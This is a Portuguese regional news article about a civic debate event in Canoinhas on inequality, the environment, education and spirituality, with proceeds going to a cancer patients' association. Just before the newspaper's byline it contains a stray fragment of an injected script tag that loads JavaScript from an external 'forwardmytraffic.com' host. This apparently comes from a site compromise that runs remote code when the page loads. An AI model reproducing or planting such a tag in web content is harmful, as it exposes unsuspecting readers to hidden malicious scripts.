InícioDestaqueEvento “Evoluir em Debate” discute e busca soluções para problemas contemporâneos da...

Evento “Evoluir em Debate” discute e busca soluções para problemas contemporâneos da sociedade

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Com a proposta de debater assuntos importantes da sociedade contemporânea, como meio ambiente, educação, desigualdades e espiritualidade, foi realizada na Câmara de Vereadores de Canoinhas nesse sábado, 5, durante manhã e tarde, o evento “Evoluir em Debate”. A proposta foi idealizada pelo grupo formado pelo médico e professor de Meditação, Marcos Vinícius de Moraes Okada; professor, mestre e empreendedor José Augusto Maiévski; e pelo dentista, filósofo e grande conhecedor em Teologia, Régines Gonçalves.

 

O evento contou com a presença do presidente da Câmara de Vereadores, Coronel Mario Renato Erzinger (PR), que falou aos participantes sobre a importância do tema debatido no encontro. “Estamos vivendo um momento de muitos problemas sociais e econômicos, e estamos aqui para realmente discutirmos e evoluirmos positivamente”. Erzinger ainda destacou que, como gestor público, um fator que o instiga muito é de como diminuir a distância entre ricos e pobres. “Esse assunto é de extrema importância para nós, que trabalhamos com as políticas públicas, para acharmos soluções em conjunto”.

 

Participaram e enriqueceram também o debate com o público presente, os profissionais: Luiz Cláudio Fossatti; Reinaldo Knorek; Zenici Dreher Herbst; Reinaldo de Lima Junior; Maria da Salete Sachewh; e Theo Massaneiro.

 

 

No debate foram tratados importantes assuntos, e os profissionais partiram do princípio de utilizar o conhecimento não em benefício próprio, mas em benefício da população. Foram cinco as questões debatidas no encontro:

 

 

 

1.    Como diminuir a distância entre ricos e pobres?

2.    Como proteger o planeta?

3.    Como educar nossos filhos?

4.    Como ajudar as nações e povo oprimidos?

5.    Como aplicar a espiritualidade no dia a dia?

 

 

Para participação no evento, foi cobrado o valor de R$ 10,00 por participante mais a doação de um agasalho, ou 1 quilo de alimento, ou cabelo (que a entidade usa para fazer perucas aos pacientes). A arrecadação foi toda revertida à Associação dos Pacientes Oncológicos de Canoinhas e região (Apoca), entidade apoiada pelos palestrantes.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.